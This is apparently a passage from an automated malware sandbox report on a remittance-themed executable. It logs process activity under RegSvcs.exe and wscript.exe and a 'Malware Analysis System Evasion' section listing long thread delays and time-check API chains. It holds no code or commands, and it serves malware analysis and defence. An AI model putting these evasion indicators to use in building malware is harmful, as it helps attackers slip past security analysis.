                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 3F4966C
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 3F59ED4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599217Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598997Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597352Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594700Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8269Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8371Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1485Jump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87538
                  Source: C:\Users\user\AppData\Local\directory\name.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeAPI coverage: 3.6 %
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 3.7 %
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
